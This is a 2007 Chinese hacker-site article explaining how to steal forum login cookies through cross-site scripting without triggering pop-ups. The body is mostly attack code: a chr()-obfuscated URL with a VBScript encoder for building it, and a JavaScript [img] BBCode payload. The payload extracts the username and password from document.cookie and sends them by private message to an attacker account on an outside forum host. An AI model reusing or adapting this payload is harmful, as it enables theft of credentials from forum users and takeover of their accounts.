黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 文章正文
[推荐]完美的解决跨站脚本得COOKIE弹框框的问题
        ★★★★★
完美的解决跨站脚本得COOKIE弹框框的问题
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-1-22

简化形式:window.open(打开的连接,窗体名,窗体大小设置)

打开的连接:

第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....

对应编码为:chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(103)&chr(101)&chr(61) =版权所有  软件 下载  学院  版权所有=

不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改,对于编码看如下代码:

<html>

<script language=vbs>

sub main()

base=form1.text1.value

for i=1 to len(base)

aa=asc(mid(base,i,1))

document.write "chr(" & aa & ")" & "&"

next

end sub

</script>

<body ><form name=form1><table>

<tr><td>

<input type=text name=text1 size=40><br>

<input type=button name=button1 onclick=main() value=change>

</td></tr>

</table></form></body></html>

第二部份:为提取的COOKIE中的用户名和密码

 ------------------------再来一个js的放便学习----------------------------------

[img]javascript:eval('var myCookie=documents.cookie;var iUser0=myCookie.indexOf(\'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=myCookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCookie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdjacentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=messanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.document.location=\'http://www.nnit30.com/newbbs/messanger.asp?action=send&touser=snwcwt&title=\'+username+\'的密码&message=username=\'+username+\'    password=\'+password+\'\';')[/img]

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    Vista+谷歌拼音输入法重现输入法04-06
    45种可以拿到Webshell的技巧04-02
    0起步接触黑客--实用价值相当高04-02
    普通文件的欺骗手法03-21
    黑客技术-ARP欺骗03-19
    跨站Script攻击和防范03-19
    超级兔子+WinRAR轻松破解收费加密03-16
    浏览器执行exe文件的探讨03-15
    菜鸟"搜"大量Web Shell的思路03-14
    轻松录制在线网络电视的方法03-14
    突破单位网管封杀QQ、MSN 端口的03-14
    菜鸟找漏洞—渗透网站的“反思”02-06
    相 关 文 章
  • 双重启动时Vista系统还原的问题及解决

  • 双重启动时Vista系统还原的问题及解决

  • BBS的通杀跨站方法

  • 跨站通杀漏洞:支持最新的phpwind等论坛

  • CPU占用100%原因及解决方法

  • CCTV的XSS跨站

  • 全面解析百度XSS跨站漏洞

  • 搜狗我也来跨站

  • 现代内存混插无法开机问题

  • USB键盘间歇性失效解决方法

  • 如何解决金山词霸与卡巴斯基冲突

  • 解决07版QQ空间无法进入的问题

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886